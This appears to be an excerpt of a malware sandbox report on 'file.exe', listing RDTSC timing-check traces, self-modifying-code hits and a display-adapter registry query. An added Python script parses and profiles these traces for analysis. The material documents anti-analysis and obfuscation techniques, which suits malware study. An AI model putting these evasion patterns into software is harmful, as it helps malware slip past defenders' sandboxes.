                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25CF7 second address: E25D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25D01 second address: E25D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26126 second address: E2614E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF99h 0x00000009 jns 00007F3A30BBDF86h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2614E second address: E26154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26154 second address: E2615A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2615A second address: E26160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E262A3 second address: E262A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E262A7 second address: E262B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 je 00007F3A30F498C6h 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2642C second address: E26476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F3A30BBDF95h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007F3A30BBDF8Bh 0x00000019 jmp 00007F3A30BBDF92h 0x0000001e pop edx 0x0000001f push esi 0x00000020 jnl 00007F3A30BBDF86h 0x00000026 pop esi 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E271B2 second address: E271BC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3A30F498C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2570C second address: E25711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25711 second address: E2572D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A30F498D2h 0x00000009 jnc 00007F3A30F498C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2572D second address: E25762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF95h 0x00000007 jmp 00007F3A30BBDF92h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F3A30BBDF86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25762 second address: E25766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2DDAC second address: E2DDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F3A30BBDF8Dh 0x0000000a jmp 00007F3A30BBDF8Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2DDD0 second address: E2DDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E0C4 second address: E2E0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E39DFC second address: E39E27 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A30F498D2h 0x00000012 jmp 00007F3A30F498CCh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E39F77 second address: E39FAA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F3A30BBDF8Ch 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ebx 0x00000014 jmp 00007F3A30BBDF92h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E39FAA second address: E39FB4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3A30F498C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60059 second address: D6005F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6005F second address: D60065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E409BF second address: E409C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E409C3 second address: E409CD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E409CD second address: E40A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A30BBDF8Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 jmp 00007F3A30BBDF98h 0x0000001a jmp 00007F3A30BBDF95h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E40A16 second address: E40A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4275D second address: E42761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42761 second address: E42784 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3A30F498D4h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5192E second address: E51933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E53797 second address: E5379F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5379F second address: E537D3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A30BBDF88h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jns 00007F3A30BBDF86h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007F3A30BBDF99h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E537D3 second address: E537DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E537DA second address: E537F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF97h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B0B4 second address: E5B0D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3A30F498D0h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B0D6 second address: E5B0DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B639 second address: E5B63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B63D second address: E5B641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B7AB second address: E5B7BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jg 00007F3A30F498C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B7BA second address: E5B7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B7C2 second address: E5B7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B947 second address: E5B94B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A627 second address: E6A62B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7A8C2 second address: E7A8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F3A30BBDF86h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7A8D1 second address: E7A8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7A8D5 second address: E7A8F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jne 00007F3A30BBDF86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F3A30BBDF8Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7A8F0 second address: E7A8FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3A30F498C6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7CAFB second address: E7CB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jns 00007F3A30BBDF8Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7CB0C second address: E7CB26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F3A30F498C6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b ja 00007F3A30F498C6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007F3A30F498C6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C62F second address: E7C66D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F3A30BBDF86h 0x00000009 jng 00007F3A30BBDF86h 0x0000000f jmp 00007F3A30BBDF91h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3A30BBDF99h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C66D second address: E7C69D instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F3A30F498D3h 0x00000014 jmp 00007F3A30F498CDh 0x00000019 jmp 00007F3A30F498CFh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8DDE0 second address: E8DDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8DDE6 second address: E8DDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8DDEE second address: E8DE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF92h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E237 second address: E8E244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F3A30F498CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E35B second address: E8E374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A30BBDF91h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E374 second address: E8E38A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007F3A30F498C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jnp 00007F3A30F498D4h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E4EE second address: E8E513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3A30BBDF8Ah 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jg 00007F3A30BBDF86h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E513 second address: E8E538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A30F498D5h 0x0000000f jng 00007F3A30F498C6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E668 second address: E8E684 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3A30BBDF86h 0x00000008 ja 00007F3A30BBDF86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnl 00007F3A30BBDF8Ch 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E90242 second address: E9024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9024E second address: E90260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A30BBDF8Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E90260 second address: E9026D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9026D second address: E90273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E92D62 second address: E92D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E92D66 second address: E92D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E930A0 second address: E930BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E930BA second address: E930BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E94B0D second address: E94B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F3A30F498C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E946B4 second address: E946B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E946B8 second address: E946C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F3A30F498DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E946C6 second address: E946DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF92h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E96648 second address: E9664E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52602A6 second address: 52602FB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3A30BBDF92h 0x00000008 or ch, 00000038h 0x0000000b jmp 00007F3A30BBDF8Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F3A30BBDF98h 0x00000019 sub cl, FFFFFF98h 0x0000001c jmp 00007F3A30BBDF8Bh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov bl, cl 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52602FB second address: 5260345 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007F3A30F498D4h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F3A30F498CDh 0x00000018 sbb cx, B896h 0x0000001d jmp 00007F3A30F498D1h 0x00000022 popfd 0x00000023 movzx ecx, dx 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5260345 second address: 526034B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 526034B second address: 526034F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
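Each interceptor line above records one hop: the address of an rdtsc the sandbox trapped, the address of the next rdtsc the thread reached, and the instructions executed in between. Read together they show two things that are easier to check by script than by eye: the hops chain (the second address of one line is the first address of the next), and the code between two reads is almost entirely push/pop pairs and short jumps, with a handful of arithmetic instructions bracketed by pushfd/popfd in the 0x526xxxx hops. That style of filler is consistent with the Oreans (Themida/WinLicense) strings that appear in the memory dump further down. The script below is an added example, not part of the Joe Sandbox report or of its tooling; it parses lines in exactly the format shown above, links them into chains and profiles the filler. The four lines embedded in it are copied from this report; the `classify` buckets are our own coarse grouping.

```python
"""Added example: rebuild the rdtsc chains from Joe Sandbox 'RDTSC instruction
interceptor' lines and profile the filler between consecutive rdtsc reads."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Four lines copied verbatim from the report above (not constructed).
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7A8D5 second address: E7A8F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jne 00007F3A30BBDF86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F3A30BBDF8Bh 0x00000015 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7A8F0 second address: E7A8FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3A30F498C6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7CAFB second address: E7CB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jns 00007F3A30BBDF8Ah 0x0000000d rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52602A6 second address: 52602FB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3A30BBDF92h 0x00000008 or ch, 00000038h 0x0000000b jmp 00007F3A30BBDF8Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F3A30BBDF98h 0x00000019 sub cl, FFFFFF98h 0x0000001c jmp 00007F3A30BBDF8Bh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov bl, cl 0x00000029 rdtsc",
]

LINE_RE = re.compile(
    r"RDTSC instruction interceptor: First address: (?P<first>[0-9A-Fa-f]+) "
    r"second address: (?P<second>[0-9A-Fa-f]+) instructions: (?P<body>.*)$"
)
# Every instruction in the body is preceded by its byte offset, e.g. "0x0000000a jne ...".
OFFSET_RE = re.compile(r"0x[0-9A-Fa-f]{8}\s+")


@dataclass
class RdtscHop:
    first: int          # address of the rdtsc that was trapped first
    second: int         # address of the rdtsc reached next
    insns: list[str]    # disassembly from the first rdtsc to the second, inclusive


def parse_hop(line: str) -> Optional[RdtscHop]:
    """One interceptor line -> RdtscHop; None for any other signature line."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    insns = [s.strip() for s in OFFSET_RE.split(m.group("body")) if s.strip()]
    return RdtscHop(int(m.group("first"), 16), int(m.group("second"), 16), insns)


def classify(insn: str) -> str:
    """Coarse bucket: rdtsc, push, pop, jmp, jcc or other (our own grouping)."""
    op = insn.split()[0].lower()
    if op == "rdtsc":
        return "rdtsc"
    if op in ("push", "pushad", "pushfd"):
        return "push"
    if op in ("pop", "popad", "popfd"):
        return "pop"
    if op == "jmp":
        return "jmp"
    if op.startswith("j"):
        return "jcc"
    return "other"


def filler_profile(hop: RdtscHop) -> Counter:
    """Histogram of what executes between the two rdtsc reads of one hop."""
    return Counter(classify(i) for i in hop.insns[1:-1])


def build_chains(hops: list[RdtscHop]) -> list[list[RdtscHop]]:
    """A hop continues the current chain when it starts at the address the
    previous hop ended on; otherwise it opens a new chain."""
    chains: list[list[RdtscHop]] = []
    for hop in hops:
        if chains and chains[-1][-1].second == hop.first:
            chains[-1].append(hop)
        else:
            chains.append([hop])
    return chains


def summarize(lines: list[str]) -> dict:
    """Chains as (first, last, hop count), the filler histogram over all hops,
    and how many instructions between reads are neither stack shuffling nor jumps."""
    hops = [h for h in map(parse_hop, lines) if h is not None]
    filler: Counter = Counter()
    for h in hops:
        filler.update(filler_profile(h))
    return {
        "hops": len(hops),
        "chains": [(hex(c[0].first), hex(c[-1].second), len(c)) for c in build_chains(hops)],
        "filler": dict(filler),
        "real_work": filler["other"],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(REPORT_LINES), indent=2))
```

Feed it the whole block of interceptor lines from a report and `summarize` tells you how many distinct rdtsc sites there are, how they chain, and whether anything between two reads does real work; here the only non-filler instructions are the four in the 0x526xxxx hop, where a prologue (`mov ebp, esp`) is interleaved with the junk.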
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BF1955 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DCD737 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DB4774 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E305CA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
